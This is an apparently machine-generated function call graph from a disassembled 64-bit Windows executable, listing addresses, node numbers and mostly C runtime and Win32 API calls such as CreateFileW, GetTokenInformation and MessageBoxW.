16953->16956 16954 7ff67aef42b2 16957 7ff67aef7e9c 37 API calls 16954->16957 16955 7ff67aef41ef 16959 7ff67aeea514 __std_exception_copy 37 API calls 16955->16959 16956->16954 16960 7ff67aef428c 16956->16960 16961 7ff67aef41dd 16956->16961 16958 7ff67aef42dc 16957->16958 16962 7ff67aef7e9c 37 API calls 16958->16962 16963 7ff67aef426d 16959->16963 16964 7ff67aeea514 __std_exception_copy 37 API calls 16960->16964 16961->16954 16961->16955 16965 7ff67aef42ed 16962->16965 16966 7ff67aef5394 16963->16966 16971 7ff67aef4275 16963->16971 16964->16963 16968 7ff67aef8090 20 API calls 16965->16968 16967 7ff67aeea970 _isindst 17 API calls 16966->16967 16969 7ff67aef53a9 16967->16969 16979 7ff67aef4356 memcpy_s 16968->16979 16970 7ff67aedc5c0 _log10_special 8 API calls 16972 7ff67aeee3c1 16970->16972 16971->16970 16996 7ff67aef3b64 16972->16996 16973 7ff67aef46ff memcpy_s 16974 7ff67aef4a3f 16975 7ff67aef3c80 37 API calls 16974->16975 16977 7ff67aef5157 16975->16977 16976 7ff67aef4397 memcpy_s 16988 7ff67aef47f3 memcpy_s 16976->16988 16991 7ff67aef4cdb memcpy_s 16976->16991 16985 7ff67aef53ac memcpy_s 37 API calls 16977->16985 16995 7ff67aef51b2 16977->16995 16978 7ff67aef49eb 16978->16974 16978->16978 16980 7ff67aef53ac memcpy_s 37 API calls 16978->16980 16979->16973 16979->16976 16981 7ff67aee4f78 memcpy_s 11 API calls 16979->16981 16980->16974 16983 7ff67aef47d0 16981->16983 16982 7ff67aef5338 16987 7ff67aef7e9c 37 API calls 16982->16987 16984 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 16983->16984 16984->16976 16985->16995 16986 7ff67aee4f78 11 API calls memcpy_s 16986->16991 16987->16971 16988->16978 16989 7ff67aee4f78 11 API calls memcpy_s 16988->16989 16993 7ff67aeea950 37 API calls _invalid_parameter_noinfo 16988->16993 16989->16988 16990 7ff67aeea950 37 API calls _invalid_parameter_noinfo 16990->16991 16991->16974 16991->16978 16991->16986 16991->16990 16992 7ff67aef3c80 37 API calls 16992->16995 16993->16988 16994 7ff67aef53ac memcpy_s 37 API calls 16994->16995 16995->16982 16995->16992 16995->16994 16997 7ff67aef3b83 16996->16997 16998 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16997->16998 16999 7ff67aef3bae memcpy_s 16997->16999 16998->16999 16999->16922 17001 7ff67aeee248 memcpy_s 17000->17001 17002 7ff67aee4830 45 API calls 17001->17002 17003 7ff67aeee302 memcpy_s 17001->17003 17002->17003 17003->16924 17005 7ff67aeedf9b 17004->17005 17008 7ff67aeedfe8 memcpy_s 17004->17008 17006 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17005->17006 17007 7ff67aeedfc7 17006->17007 17007->16924 17008->17008 17009 7ff67aeee053 17008->17009 17011 7ff67aee4830 45 API calls 17008->17011 17010 7ff67aeea514 __std_exception_copy 37 API calls 17009->17010 17014 7ff67aeee095 memcpy_s 17010->17014 17011->17009 17012 7ff67aeea970 _isindst 17 API calls 17013 7ff67aeee140 17012->17013 17014->17012 17016 7ff67aee0cbe 17015->17016 17017 7ff67aee0ccf 17015->17017 17016->16842 17017->17016 17018 7ff67aeed66c _fread_nolock 12 API calls 17017->17018 17019 7ff67aee0d00 17018->17019 17020 7ff67aee0d14 17019->17020 17021 7ff67aeea9b8 __free_lconv_mon 11 API calls 17019->17021 17022 7ff67aeea9b8 __free_lconv_mon 11 API calls 17020->17022 17021->17020 17022->17016 17024 7ff67aee47d6 17023->17024 17026 7ff67aee47de 17023->17026 17025 7ff67aee4830 45 API calls 17024->17025 17025->17026 17026->16852 17028 7ff67aeeda41 17027->17028 17029 7ff67aee486f 17027->17029 17028->17029 17035 7ff67aef3374 17028->17035 17031 7ff67aeeda94 17029->17031 17032 7ff67aee487f 17031->17032 17033 7ff67aeedaad 17031->17033 17032->16775 17033->17032 17048 7ff67aef26c0 17033->17048 17036 7ff67aeeb1c0 __GetCurrentState 45 API calls 17035->17036 17037 7ff67aef3383 17036->17037 17038 7ff67aef33ce 17037->17038 17047 7ff67aef0348 EnterCriticalSection 17037->17047 17038->17029 17049 7ff67aeeb1c0 __GetCurrentState 45 API calls 17048->17049 17050 7ff67aef26c9 17049->17050 17057 7ff67aef6df8 17051->17057 17056 7ff67aeef919 MultiByteToWideChar 17054->17056 17060 7ff67aef6e5c 17057->17060 17058 7ff67aedc5c0 _log10_special 8 API calls 17059 7ff67aef012d 17058->17059 17059->16877 17060->17058 17062 7ff67aee107f 17061->17062 17063 7ff67aee106d 17061->17063 17066 7ff67aee108d 17062->17066 17069 7ff67aee10c9 17062->17069 17064 7ff67aee4f78 memcpy_s 11 API calls 17063->17064 17065 7ff67aee1072 17064->17065 17067 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17065->17067 17068 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17066->17068 17077 7ff67aee107d 17067->17077 17068->17077 17070 7ff67aee1445 17069->17070 17072 7ff67aee4f78 memcpy_s 11 API calls 17069->17072 17071 7ff67aee4f78 memcpy_s 11 API calls 17070->17071 17070->17077 17073 7ff67aee16d9 17071->17073 17074 7ff67aee143a 17072->17074 17075 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17073->17075 17076 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17074->17076 17075->17077 17076->17070 17077->16739 17079 7ff67aee0774 17078->17079 17106 7ff67aee04d4 17079->17106 17081 7ff67aee078d 17081->16393 17118 7ff67aee042c 17082->17118 17086 7ff67aedc8c0 17085->17086 17087 7ff67aed2930 GetCurrentProcessId 17086->17087 17088 7ff67aed1c80 49 API calls 17087->17088 17089 7ff67aed2979 17088->17089 17132 7ff67aee49f4 17089->17132 17094 7ff67aed1c80 49 API calls 17095 7ff67aed29ff 17094->17095 17162 7ff67aed2620 17095->17162 17098 7ff67aedc5c0 _log10_special 8 API calls 17099 7ff67aed2a31 17098->17099 17099->16432 17101 7ff67aed1b89 17100->17101 17102 7ff67aee0189 17100->17102 17101->16431 17101->16432 17103 7ff67aee4f78 memcpy_s 11 API calls 17102->17103 17104 7ff67aee018e 17103->17104 17105 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17104->17105 17105->17101 17107 7ff67aee053e 17106->17107 17108 7ff67aee04fe 17106->17108 17107->17108 17110 7ff67aee054a 17107->17110 17109 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17108->17109 17111 7ff67aee0525 17109->17111 17117 7ff67aee54dc EnterCriticalSection 17110->17117 17111->17081 17119 7ff67aed1a20 17118->17119 17120 7ff67aee0456 17118->17120 17119->16400 17119->16401 17120->17119 17121 7ff67aee04a2 17120->17121 17122 7ff67aee0465 memcpy_s 17120->17122 17131 7ff67aee54dc EnterCriticalSection 17121->17131 17125 7ff67aee4f78 memcpy_s 11 API calls 17122->17125 17127 7ff67aee047a 17125->17127 17129 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17127->17129 17129->17119 17135 7ff67aee4a4e 17132->17135 17133 7ff67aee4a73 17136 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17133->17136 17134 7ff67aee4aaf 17171 7ff67aee2c80 17134->17171 17135->17133 17135->17134 17149 7ff67aee4a9d 17136->17149 17138 7ff67aee4b8c 17140 7ff67aeea9b8 __free_lconv_mon 11 API calls 17138->17140 17139 7ff67aedc5c0 _log10_special 8 API calls 17142 7ff67aed29c3 17139->17142 17140->17149 17150 7ff67aee51d0 17142->17150 17143 7ff67aee4b61 17146 7ff67aeea9b8 __free_lconv_mon 11 API calls 17143->17146 17144 7ff67aee4bb0 17144->17138 17145 7ff67aee4bba 17144->17145 17148 7ff67aeea9b8 __free_lconv_mon 11 API calls 17145->17148 17146->17149 17147 7ff67aee4b58 17147->17138 17147->17143 17148->17149 17149->17139 17151 7ff67aeeb338 memcpy_s 11 API calls 17150->17151 17152 7ff67aee51e7 17151->17152 17153 7ff67aeeec08 memcpy_s 11 API calls 17152->17153 17156 7ff67aee5227 17152->17156 17159 7ff67aed29e5 17152->17159 17154 7ff67aee521c 17153->17154 17155 7ff67aeea9b8 __free_lconv_mon 11 API calls 17154->17155 17155->17156 17156->17159 17309 7ff67aeeec90 17156->17309 17159->17094 17160 7ff67aeea970 _isindst 17 API calls 17161 7ff67aee526c 17160->17161 17163 7ff67aed262f 17162->17163 17164 7ff67aed9400 2 API calls 17163->17164 17165 7ff67aed2660 17164->17165 17166 7ff67aed2683 MessageBoxA 17165->17166 17167 7ff67aed266f MessageBoxW 17165->17167 17168 7ff67aed2690 17166->17168 17167->17168 17169 7ff67aedc5c0 _log10_special 8 API calls 17168->17169 17170 7ff67aed26a0 17169->17170 17170->17098 17172 7ff67aee2cbe 17171->17172 17173 7ff67aee2cae 17171->17173 17174 7ff67aee2cc7 17172->17174 17179 7ff67aee2cf5 17172->17179 17175 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17173->17175 17176 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17174->17176 17177 7ff67aee2ced 17175->17177 17176->17177 17177->17138 17177->17143 17177->17144 17177->17147 17178 7ff67aee4830 45 API calls 17178->17179 17179->17173 17179->17177 17179->17178 17181 7ff67aee2fa4 17179->17181 17185 7ff67aee3610 17179->17185 17211 7ff67aee32d8 17179->17211 17241 7ff67aee2b60 17179->17241 17183 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17181->17183 17183->17173 17186 7ff67aee3652 17185->17186 17187 7ff67aee36c5 17185->17187 17188 7ff67aee36ef 17186->17188 17189 7ff67aee3658 17186->17189 17190 7ff67aee371f 17187->17190 17191 7ff67aee36ca 17187->17191 17258 7ff67aee1bc0 17188->17258 17196 7ff67aee365d 17189->17196 17199 7ff67aee372e 17189->17199 17190->17188 17190->17199 17209 7ff67aee3688 17190->17209 17192 7ff67aee36ff 17191->17192 17193 7ff67aee36cc 17191->17193 17265 7ff67aee17b0 17192->17265 17195 7ff67aee366d 17193->17195 17202 7ff67aee36db 17193->17202 17210 7ff67aee375d 17195->17210 17244 7ff67aee3f74 17195->17244 17196->17195 17200 7ff67aee36a0 17196->17200 17196->17209 17199->17210 17272 7ff67aee1fd0 17199->17272 17200->17210 17254 7ff67aee4430 17200->17254 17202->17188 17203 7ff67aee36e0 17202->17203 17206 7ff67aee45c8 37 API calls 17203->17206 17203->17210 17205 7ff67aedc5c0 _log10_special 8 API calls 17207 7ff67aee39f3 17205->17207 17206->17209 17207->17179 17209->17210 17279 7ff67aeee8c8 17209->17279 17210->17205 17212 7ff67aee32e3 17211->17212 17213 7ff67aee32f9 17211->17213 17214 7ff67aee3337 17212->17214 17215 7ff67aee3652 17212->17215 17216 7ff67aee36c5 17212->17216 17213->17214 17217 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17213->17217 17214->17179 17218 7ff67aee36ef 17215->17218 17219 7ff67aee3658 17215->17219 17220 7ff67aee371f 17216->17220 17221 7ff67aee36ca 17216->17221 17217->17214 17223 7ff67aee1bc0 38 API calls 17218->17223 17226 7ff67aee365d 17219->17226 17227 7ff67aee372e 17219->17227 17220->17218 17220->17227 17239 7ff67aee3688 17220->17239 17222 7ff67aee36ff 17221->17222 17228 7ff67aee36cc 17221->17228 17224 7ff67aee17b0 38 API calls 17222->17224 17223->17239 17224->17239 17225 7ff67aee3f74 47 API calls 17225->17239 17229 7ff67aee366d 17226->17229 17230 7ff67aee36a0 17226->17230 17226->17239 17231 7ff67aee1fd0 38 API calls 17227->17231 17240 7ff67aee375d 17227->17240 17228->17229 17232 7ff67aee36db 17228->17232 17229->17225 17229->17240 17234 7ff67aee4430 47 API calls 17230->17234 17230->17240 17231->17239 17232->17218 17233 7ff67aee36e0 17232->17233 17236 7ff67aee45c8 37 API calls 17233->17236 17233->17240 17234->17239 17235 7ff67aedc5c0 _log10_special 8 API calls 17237 7ff67aee39f3 17235->17237 17236->17239 17237->17179 17238 7ff67aeee8c8 47 API calls 17238->17239 17239->17238 17239->17240 17240->17235 17292 7ff67aee0d84 17241->17292 17245 7ff67aee3f96 17244->17245 17246 7ff67aee0bf0 12 API calls 17245->17246 17247 7ff67aee3fde 17246->17247 17248 7ff67aeee5e0 46 API calls 17247->17248 17250 7ff67aee40b1 17248->17250 17249 7ff67aee40d3 17252 7ff67aee4830 45 API calls 17249->17252 17253 7ff67aee415c 17249->17253 17250->17249 17251 7ff67aee4830 45 API calls 17250->17251 17251->17249 17252->17253 17253->17209 17255 7ff67aee4448 17254->17255 17257 7ff67aee44b0 17254->17257 17256 7ff67aeee8c8 47 API calls 17255->17256 17255->17257 17256->17257 17257->17209 17259 7ff67aee1bf3 17258->17259 17260 7ff67aee1c22 17259->17260 17263 7ff67aee1cdf 17259->17263 17261 7ff67aee1c5f 17260->17261 17262 7ff67aee0bf0 12 API calls 17260->17262 17261->17209 17262->17261 17264 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17263->17264 17264->17261 17266 7ff67aee17e3 17265->17266 17267 7ff67aee1812 17266->17267 17269 7ff67aee18cf 17266->17269 17268 7ff67aee0bf0 12 API calls 17267->17268 17271 7ff67aee184f 17267->17271 17268->17271 17270 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17269->17270 17270->17271 17271->17209 17273 7ff67aee2003 17272->17273 17274 7ff67aee2032 17273->17274 17276 7ff67aee20ef 17273->17276 17275 7ff67aee0bf0 12 API calls 17274->17275 17278 7ff67aee206f 17274->17278 17275->17278 17277 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17276->17277 17277->17278 17278->17209 17280 7ff67aeee8f0 17279->17280 17281 7ff67aeee935 17280->17281 17282 7ff67aee4830 45 API calls 17280->17282 17285 7ff67aeee8f5 memcpy_s 17280->17285 17288 7ff67aeee91e memcpy_s 17280->17288 17281->17285 17281->17288 17289 7ff67aef0858 17281->17289 17282->17281 17283 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17283->17285 17285->17209 17288->17283 17288->17285 17290 7ff67aef087c WideCharToMultiByte 17289->17290 17293 7ff67aee0dc3 17292->17293 17294 7ff67aee0db1 17292->17294 17296 7ff67aee0e0d 17293->17296 17298 7ff67aee0dd0 17293->17298 17295 7ff67aee4f78 memcpy_s 11 API calls 17294->17295 17297 7ff67aee0db6 17295->17297 17301 7ff67aee0eb6 17296->17301 17302 7ff67aee4f78 memcpy_s 11 API calls 17296->17302 17299 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17297->17299 17300 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17298->17300 17304 7ff67aee0dc1 17299->17304 17300->17304 17303 7ff67aee4f78 memcpy_s 11 API calls 17301->17303 17301->17304 17305 7ff67aee0eab 17302->17305 17306 7ff67aee0f60 17303->17306 17304->17179 17308 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17305->17308 17307 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17306->17307 17307->17304 17308->17301 17314 7ff67aeeecad 17309->17314 17310 7ff67aeeecb2 17311 7ff67aee524d 17310->17311 17312 7ff67aee4f78 memcpy_s 11 API calls 17310->17312 17311->17159 17311->17160 17313 7ff67aeeecbc 17312->17313 17315 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17313->17315 17314->17310 17314->17311 17316 7ff67aeeecfc 17314->17316 17315->17311 17316->17311 17317 7ff67aee4f78 memcpy_s 11 API calls 17316->17317 17317->17313 17319 7ff67aee82b5 17318->17319 17320 7ff67aee82c8 17318->17320 17321 7ff67aee4f78 memcpy_s 11 API calls 17319->17321 17328 7ff67aee7f2c 17320->17328 17324 7ff67aee82ba 17321->17324 17325 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17324->17325 17327 7ff67aee82c6 17325->17327 17327->16452 17335 7ff67aef0348 EnterCriticalSection 17328->17335 17337 7ff67aed8823 __vcrt_freefls 17336->17337 17338 7ff67aed87a1 GetTokenInformation 17336->17338 17341 7ff67aed883c 17337->17341 17342 7ff67aed8836 CloseHandle 17337->17342 17339 7ff67aed87c2 GetLastError 17338->17339 17340 7ff67aed87cd 17338->17340 17339->17337 17339->17340 17340->17337 17343 7ff67aed87e9 GetTokenInformation 17340->17343 17341->16457 17342->17341 17343->17337 17344 7ff67aed880c 17343->17344 17344->17337 17345 7ff67aed8816 ConvertSidToStringSidW 17344->17345 17345->17337 17347 7ff67aedc8c0 17346->17347 17348 7ff67aed2b74 GetCurrentProcessId 17347->17348 17349 7ff67aed26b0 48 API calls 17348->17349 17350 7ff67aed2bc7 17349->17350 17351 7ff67aee4c48 48 API calls 17350->17351 17352 7ff67aed2c10 MessageBoxW 17351->17352 17353 7ff67aedc5c0 _log10_special 8 API calls 17352->17353 17354 7ff67aed2c40 17353->17354 17354->16467 17356 7ff67aed25e5 17355->17356 17357 7ff67aee4c48 48 API calls 17356->17357 17358 7ff67aed2604 17357->17358 17358->16483 17394 7ff67aee8804 17359->17394 17363 7ff67aed81cc 17362->17363 17364 7ff67aed9400 2 API calls 17363->17364 17365 7ff67aed81eb 17364->17365 17366 7ff67aed81f3 17365->17366 17367 7ff67aed8206 ExpandEnvironmentStringsW 17365->17367 17368 7ff67aed2810 49 API calls 17366->17368 17369 7ff67aed822c __vcrt_freefls 17367->17369 17370 7ff67aed81ff __vcrt_freefls 17368->17370 17371 7ff67aed8243 17369->17371 17372 7ff67aed8230 17369->17372 17373 7ff67aedc5c0 _log10_special 8 API calls 17370->17373 17376 7ff67aed82af 17371->17376 17377 7ff67aed8251 GetDriveTypeW 17371->17377 17374 7ff67aed2810 49 API calls 17372->17374 17375 7ff67aed839f 17373->17375 17374->17370 17532 7ff67aee7e78 17376->17532 17380 7ff67aed8285 17377->17380 17381 7ff67aed82a0 17377->17381 17435 7ff67aef15c8 17394->17435 17494 7ff67aef1340 17435->17494 17515 7ff67aef0348 EnterCriticalSection 17494->17515 17634 7ff67aed455a 17633->17634 17635 7ff67aed9400 2 API calls 17634->17635 17636 7ff67aed457f 17635->17636 17637 7ff67aedc5c0 _log10_special 8 API calls 17636->17637 17638 7ff67aed45a7 17637->17638 17638->16509 17640 7ff67aed7e1e 17639->17640 17641 7ff67aed7f42 17640->17641 17642 7ff67aed1c80 49 API calls 17640->17642 17643 7ff67aedc5c0 _log10_special 8 API calls 17641->17643 17646 7ff67aed7ea5 17642->17646 17644 7ff67aed7f73 17643->17644 17644->16509 17645 7ff67aed1c80 49 API calls 17645->17646 17646->17641 17646->17645 17647 7ff67aed4550 10 API calls 17646->17647 17648 7ff67aed7efb 17646->17648 17647->17646 17649 7ff67aed9400 2 API calls 17648->17649 17650 7ff67aed7f13 CreateDirectoryW 17649->17650 17650->17641 17650->17646 17652 7ff67aed1613 17651->17652 17653 7ff67aed1637 17651->17653 17772 7ff67aed1050 17652->17772 17655 7ff67aed45b0 108 API calls 17653->17655 17657 7ff67aed164b 17655->17657 17656 7ff67aed1618 17660 7ff67aed162e 17656->17660 17663 7ff67aed2710 54 API calls 17656->17663 17658 7ff67aed1682 17657->17658 17659 7ff67aed1653 17657->17659 17662 7ff67aed45b0 108 API calls 17658->17662 17661 7ff67aee4f78 memcpy_s 11 API calls 17659->17661 17660->16509 17664 7ff67aed1658 17661->17664 17665 7ff67aed1696 17662->17665 17663->17660 17666 7ff67aed2910 54 API calls 17664->17666 17667 7ff67aed169e 17665->17667 17668 7ff67aed16b8 17665->17668 17669 7ff67aed1671 17666->17669 17670 7ff67aed2710 54 API calls 17667->17670 17671 7ff67aee0744 73 API calls 17668->17671 17669->16509 17672 7ff67aed16ae 17670->17672 17673 7ff67aed16cd 17671->17673 17678 7ff67aee00bc 74 API calls 17672->17678 17674 7ff67aed16d1 17673->17674 17675 7ff67aed16f9 17673->17675 17679 7ff67aee4f78 memcpy_s 11 API calls 17674->17679 17676 7ff67aed16ff 17675->17676 17677 7ff67aed1717 17675->17677 17750 7ff67aed1210 17676->17750 17684 7ff67aed1739 17677->17684 17694 7ff67aed1761 17677->17694 17682 7ff67aed1829 17678->17682 17680 7ff67aed16d6 17679->17680 17682->16509 17700 7ff67aed717b 17699->17700 17702 7ff67aed7134 17699->17702 17700->16509 17702->17700 17836 7ff67aee5094 17702->17836 17704 7ff67aed4191 17703->17704 17705 7ff67aed44d0 49 API calls 17704->17705 17706 7ff67aed41cb 17705->17706 17707 7ff67aed44d0 49 API calls 17706->17707 17708 7ff67aed41db 17707->17708 17709 7ff67aed422c 17708->17709 17710 7ff67aed41fd 17708->17710 17711 7ff67aed4100 51 API calls 17709->17711 17867 7ff67aed4100 17710->17867 17713 7ff67aed422a 17711->17713 17714 7ff67aed428c 17713->17714 17715 7ff67aed4257 17713->17715 17717 7ff67aed4100 51 API calls 17714->17717 17874 7ff67aed7ce0 17715->17874 17719 7ff67aed42b0 17717->17719 17748 7ff67aed1c80 49 API calls 17747->17748 17749 7ff67aed4464 17748->17749 17749->16509 17773 7ff67aed45b0 108 API calls 17772->17773 17774 7ff67aed108c 17773->17774 17775 7ff67aed1094 17774->17775 17776 7ff67aed10a9 17774->17776 17778 7ff67aed2710 54 API calls 17775->17778 17777 7ff67aee0744 73 API calls 17776->17777 17779 7ff67aed10bf 17777->17779 17784 7ff67aed10a4 __vcrt_freefls 17778->17784 17780 7ff67aed10c3 17779->17780 17781 7ff67aed10e6 17779->17781 17782 7ff67aee4f78 memcpy_s 11 API calls 17780->17782 17786 7ff67aed1122 17781->17786 17787 7ff67aed10f7 17781->17787 17783 7ff67aed10c8 17782->17783 17785 7ff67aed2910 54 API calls 17783->17785 17784->17656 17802 7ff67aed10e1 __vcrt_freefls 17785->17802 17788 7ff67aed1129 17786->17788 17796 7ff67aed113c 17786->17796 17789 7ff67aee4f78 memcpy_s 11 API calls 17787->17789 17790 7ff67aed1210 92 API calls 17788->17790 17791 7ff67aed1100 17789->17791 17790->17802 17792 7ff67aee00bc 74 API calls 17795 7ff67aee040c _fread_nolock 53 API calls 17795->17796 17796->17795 17798 7ff67aed11ed 17796->17798 17796->17802 17799 7ff67aee4f78 memcpy_s 11 API calls 17798->17799 17802->17792 17837 7ff67aee50a1 17836->17837 17839 7ff67aee50ce 17836->17839 17840 7ff67aee4f78 memcpy_s 11 API calls 17837->17840 17841 7ff67aee5058 17837->17841 17838 7ff67aee50f1 17842 7ff67aee4f78 memcpy_s 11 API calls 17838->17842 17839->17838 17843 7ff67aee510d 17839->17843 17844 7ff67aee50ab 17840->17844 17841->17702 17845 7ff67aee50f6 17842->17845 17851 7ff67aee4fbc 17843->17851 17847 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17844->17847 17848 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17845->17848 17849 7ff67aee50b6 17847->17849 17850 7ff67aee5101 17848->17850 17849->17702 17850->17702 17852 7ff67aee4fe0 17851->17852 17853 7ff67aee4fdb 17851->17853 17852->17853 17854 7ff67aeeb1c0 __GetCurrentState 45 API calls 17852->17854 17853->17850 17855 7ff67aee4ffb 17854->17855 17859 7ff67aeed9f4 17855->17859 17860 7ff67aeeda09 17859->17860 17862 7ff67aee501e 17859->17862 17861 7ff67aef3374 45 API calls 17860->17861 17860->17862 17861->17862 17863 7ff67aeeda60 17862->17863 17864 7ff67aeeda75 17863->17864 17866 7ff67aeeda88 17863->17866 17864->17866 17866->17853 17868 7ff67aed4126 17867->17868 17869 7ff67aee49f4 49 API calls 17868->17869 17870 7ff67aed414c 17869->17870 17871 7ff67aed415d 17870->17871 17872 7ff67aed4550 10 API calls 17870->17872 17871->17713 17875 7ff67aed7cf5 17874->17875 17931 7ff67aee5f38 17930->17931 17932 7ff67aee5f5e 17931->17932 17934 7ff67aee5f91 17931->17934 17933 7ff67aee4f78 memcpy_s 11 API calls 17932->17933 17935 7ff67aee5f63 17933->17935 17936 7ff67aee5fa4 17934->17936 17937 7ff67aee5f97 17934->17937 17938 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17935->17938 17949 7ff67aeeac98 17936->17949 17939 7ff67aee4f78 memcpy_s 11 API calls 17937->17939 17941 7ff67aed4606 17938->17941 17939->17941 17941->16545 17962 7ff67aef0348 EnterCriticalSection 17949->17962 18322 7ff67aee7968 18321->18322 18325 7ff67aee7444 18322->18325 18324 7ff67aee7981 18324->16555 18326 7ff67aee745f 18325->18326 18327 7ff67aee748e 18325->18327 18329 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 18326->18329 18335 7ff67aee54dc EnterCriticalSection 18327->18335 18331 7ff67aee747f 18329->18331 18331->18324 18337 7ff67aedfeb3 18336->18337 18338 7ff67aedfee1 18336->18338 18339 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 18337->18339 18345 7ff67aedfed3 18338->18345 18346 7ff67aee54dc EnterCriticalSection 18338->18346 18339->18345 18345->16559 18348 7ff67aed45b0 108 API calls 18347->18348 18349 7ff67aed1493 18348->18349 18350 7ff67aed149b 18349->18350 18351 7ff67aed14bc 18349->18351 18352 7ff67aed2710 54 API calls 18350->18352 18353 7ff67aee0744 73 API calls 18351->18353 18354 7ff67aed14ab 18352->18354 18355 7ff67aed14d1 18353->18355 18354->16585 18356 7ff67aed14d5 18355->18356 18357 7ff67aed14f8 18355->18357 18358 7ff67aee4f78 memcpy_s 11 API calls 18356->18358 18360 7ff67aed1532 18357->18360 18361 7ff67aed1508 18357->18361 18454 7ff67aed6365 18453->18454 18455 7ff67aed1c80 49 API calls 18454->18455 18456 7ff67aed63a1 18455->18456 18457 7ff67aed63aa 18456->18457 18458 7ff67aed63cd 18456->18458 18460 7ff67aed2710 54 API calls 18457->18460 18459 7ff67aed4620 49 API calls 18458->18459 18463 7ff67aed63e5 18459->18463 18461 7ff67aed63c3 18460->18461 18466 7ff67aedc5c0 _log10_special 8 API calls 18461->18466 18462 7ff67aed6403 18465 7ff67aed4550 10 API calls 18462->18465 18463->18462 18464 7ff67aed2710 54 API calls 18463->18464 18464->18462 18467 7ff67aed640d 18465->18467 18468 7ff67aed336e 18466->18468 18469 7ff67aed641b 18467->18469 18470 7ff67aed9070 3 API calls 18467->18470 18468->16654 18484 7ff67aed64f0 18468->18484 18471 7ff67aed4620 49 API calls 18469->18471 18470->18469 18633 7ff67aed53f0 18484->18633 18635 7ff67aed541c 18633->18635 18634 7ff67aed5424 18635->18634 18638 7ff67aed55c4 18635->18638 18664 7ff67aee6b14 18635->18664 19976 7ff67aef1720 19987 7ff67aef7454 19976->19987 19988 7ff67aef7461 19987->19988 19989 7ff67aeea9b8 __free_lconv_mon 11 API calls 19988->19989 19990 7ff67aef747d 19988->19990 19989->19988 19991 7ff67aeea9b8 __free_lconv_mon 11 API calls 19990->19991 19992 7ff67aef1729 19990->19992 19991->19990 19993 7ff67aef0348 EnterCriticalSection 19992->19993 19380 7ff67aee5698 19381 7ff67aee56b2 19380->19381 19382 7ff67aee56cf 19380->19382 19384 7ff67aee4f58 _fread_nolock 11 API calls 19381->19384 19382->19381 19383 7ff67aee56e2 CreateFileW 19382->19383 19385 7ff67aee574c 19383->19385 19386 7ff67aee5716 19383->19386 19387 7ff67aee56b7 19384->19387 19431 7ff67aee5c74 19385->19431 19405 7ff67aee57ec GetFileType 19386->19405 19390 7ff67aee4f78 memcpy_s 11 API calls 19387->19390 19391 7ff67aee56bf 19390->19391 19394 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19391->19394 19400 7ff67aee56ca 19394->19400 19395 7ff67aee5741 CloseHandle 19395->19400 19396 7ff67aee572b CloseHandle 19396->19400 19397 7ff67aee5755 19401 7ff67aee4eec _fread_nolock 11 API calls 19397->19401 19398 7ff67aee5780 19452 7ff67aee5a34 19398->19452 19404 7ff67aee575f 19401->19404 19404->19400 19406 7ff67aee583a 19405->19406 19407 7ff67aee58f7 19405->19407 19408 7ff67aee5866 GetFileInformationByHandle 19406->19408 19412 7ff67aee5b70 21 API calls 19406->19412 19409 7ff67aee58ff 19407->19409 19410 7ff67aee5921 19407->19410 19413 7ff67aee5912 GetLastError 19408->19413 19414 7ff67aee588f 19408->19414 19409->19413 19415 7ff67aee5903 19409->19415 19411 7ff67aee5944 PeekNamedPipe 19410->19411 19429 7ff67aee58e2 19410->19429 19411->19429 19416 7ff67aee5854 19412->19416 19419 7ff67aee4eec _fread_nolock 11 API calls 19413->19419 19417 7ff67aee5a34 51 API calls 19414->19417 19418 7ff67aee4f78 memcpy_s 11 API calls 19415->19418 19416->19408 19416->19429 19421 7ff67aee589a 19417->19421 19418->19429 19419->19429 19420 7ff67aedc5c0 _log10_special 8 API calls 19422 7ff67aee5724 19420->19422 19469 7ff67aee5994 19421->19469 19422->19395 19422->19396 19425 7ff67aee5994 10 API calls 19426 7ff67aee58b9 19425->19426 19427 7ff67aee5994 10 API calls 19426->19427 19428 7ff67aee58ca 19427->19428 19428->19429 19430 7ff67aee4f78 memcpy_s 11 API calls 19428->19430 19429->19420 19430->19429 19432 7ff67aee5caa 19431->19432 19433 7ff67aee4f78 memcpy_s 11 API calls 19432->19433 19451 7ff67aee5d42 __vcrt_freefls 19432->19451 19435 7ff67aee5cbc 19433->19435 19434 7ff67aedc5c0 _log10_special 8 API calls 19436 7ff67aee5751 19434->19436 19437 7ff67aee4f78 memcpy_s 11 API calls 19435->19437 19436->19397 19436->19398 19438 7ff67aee5cc4 19437->19438 19439 7ff67aee7e78 45 API calls 19438->19439 19440 7ff67aee5cd9 19439->19440 19441 7ff67aee5ce1 19440->19441 19442 7ff67aee5ceb 19440->19442 19443 7ff67aee4f78 memcpy_s 11 API calls 19441->19443 19444 7ff67aee4f78 memcpy_s 11 API calls 19442->19444 19448 7ff67aee5ce6 19443->19448 19445 7ff67aee5cf0 19444->19445 19446 7ff67aee4f78 memcpy_s 11 API calls 19445->19446 19445->19451 19447 7ff67aee5cfa 19446->19447 